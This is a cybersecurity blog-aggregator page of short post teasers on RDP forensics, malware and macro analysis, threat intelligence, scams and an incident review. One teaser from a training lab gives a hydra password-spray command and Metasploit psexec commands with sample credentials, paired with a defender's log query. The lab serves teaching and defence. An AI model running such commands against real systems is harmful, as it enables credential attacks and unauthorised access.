Category: Interesting Stuff

What is RDP, why is it a very nearly ubiquitous finding in incident response, and how can investigators run it to ground it when it goes wrong? An Active Adversary Special Report.

Remote Desktop Protocol: The Series

Part 1: Remote Desktop Protocol: Introduction (post, video)Part 2: Remote Desktop Protocol: Exposed RDP (is dangerous) (post, video)Part 3: RDP: Queries for Investigation (post, video)Part 4: RDP Time Zone Bias (post, video)Part 5: Executing the External RDP Query (post, video)Part 6: Executing the 4624_4625 Login Query (post, video)GitHub query repository: SophosRapidResponse/OSQueryTranscript repository: sophoslabs/video-transcriptsYouTube playlist: Remote Desktop Protocol: The Series

Remote Desktop Protocol (RDP) was developed by Microsoft to allow users, administrators, and others to connect to remote computers over a network connection using a handy graphical user interface (GUI).…

Read More

The list comprises 25 influential figures in the technology sector, arranged by age from youngest to oldest. These individuals are recognized for their significant contributions across various areas of technology, including internet innovations, software development, consumer electronics, and digital services.

Their work has not only transformed how we interact with technology on a daily basis but also laid foundational advancements that define the modern digital era.…

Read More
Must-Read Cybersecurity Blogs [List of Blogs & Websites]

1. Unsupervised Learning

An experienced cybersecurity expert, consultant and writer, Miessler takes a personal approach on his blog with an “about me” page that not only details his professional interests but also his hobbies, interests and political views. His offerings include newsletters and essays on a variety of topics and a podcast called Unsupervised Learning that focuses on security and artificial intelligence.…

Read More

Experience Level required: beginner

In this blog we will Learn how to analyze MS Office Macro enabled Documents.

1st sample: 8d15fadf25887c2c974e521914bb7cba762a8f03b1c97a2bc8198e9fb94d45a5 2nd sample: a9f8b7b65e972545591683213bb198c1767424423ecc8269833f6e784aa8bc99

Let’s see the sample in Virus Total

37 of 63 security vendors detected this file as malicious.

Let’s open the file.

It uses a social engineering technique to persuade the user to enable the macros that lead to the infection of the user.…

Read More

Cyber threat intelligence (CTI) is a framework for collecting, processing, and analyzing information about potential or ongoing cyber threats.  

Put simply, it’s the collection of various types of threat intelligence, such as IOCs, TTPs used by threat actors, and their motivations and capabilities, with the ultimate goal of understanding your system’s attack surface and proactively patching vulnerabilities.…

Read More
Attacker launches password sprayAttacker

Password spray: hydra -L users.txt -P seasons-2023.txt 192.168.37.237 smb -u

Defender

Count successful (4624) and failed (4625) logins:

Get-WinEvent -Path C:\labs\valkyrie-security-logons.evtx | Group-Object id -NoElement | sort count

Attacker uses sprayed credentials to attempt to log in via Metasplot’s psexecAttackermsfconsole msf6 > use exploit/windows/smb/psexec msf6 > set RHOSTS 192.168.37.237 msf6 > set SMBUser fgaeta msf6 > set SMBPass W1nter2023!…
Read More

We hear about “cyber attacks” in the news every week!  But – what actually happens ‘during’ the attack, what happens in the background, behind the scenes, from the moment the event ‘begins’ until the moment it’s realized something is amiss? Or worse – when it’s not realized something is amiss and things continue on autopilot…

What’s In It For Me❓

In this blog post we’ll lay down the foundations of analyzing and reverse engineering Windows malicious files. We’ll…

Read More

A proxy server is an intermediary system that sits between end users and the websites or services they access online. It provides functions like web filtering, enhanced security, and data caching to improve network performance. Proxies also help in masking user IP addresses, enabling anonymous web browsing and managing internet usage within an organization.…

Read More

Check out our on-demand Annual Report webinar or read on for a summary of key topics and themes in the report.

2023 was a year in which cybercrime evolved in significant ways. Our 2023 annual report serves as a playbook of adversaries’ tactics, techniques, and procedures (TTPs) in 2023, with the goal of giving your security team a 360-degree view of the threat landscape.…

Read More

Online investment scams these days are no longer an issue limited to specific nations, now becoming a social issue prevalent around the globe. Scammers (criminals) deceive their victims through illegal and immoral means, extorting financial assets including cash and virtual assets from them. They are usually a part of a structured criminal syndicate, where they devise sophisticated scenarios to commit “transnational” fraud crimes.…

Read More

In this report, we will conduct a comprehensive analysis of Gafgyt, which is an ELF malware. Our aim is to examine the malware’s capabilities and determine its functions:

DDoS Attack Capabilities Communication with Command and Control (C&C) Server Evade detection Network Setup and Configuration Process Manipulation

Gafgyt malware, which is also known as Bashlite has targeted millions of vulnerable IoT devices in the last few years.…

Read More

Those who have worked in our industry for a certain amount of time will be acutely aware that executives often encounter information security media articles and flag them to their teams. This is something myself and my peers at other organizations also face. So I decided to write about it, expand my thoughts, offer some tips from my experience and research to hopefully provide a practical solution for a common problem.…

Read More

The U.S. Department of Homeland Security released the Cyber Safety Review Board’s (CSRB) findings and recommendations following its independent review of the Summer 2023 Microsoft Exchange Online intrusion. The review detailed operational and strategic decisions that led to the intrusion and recommended specific practices for industry and government to implement to ensure an intrusion of this magnitude does not happen again.…

Read More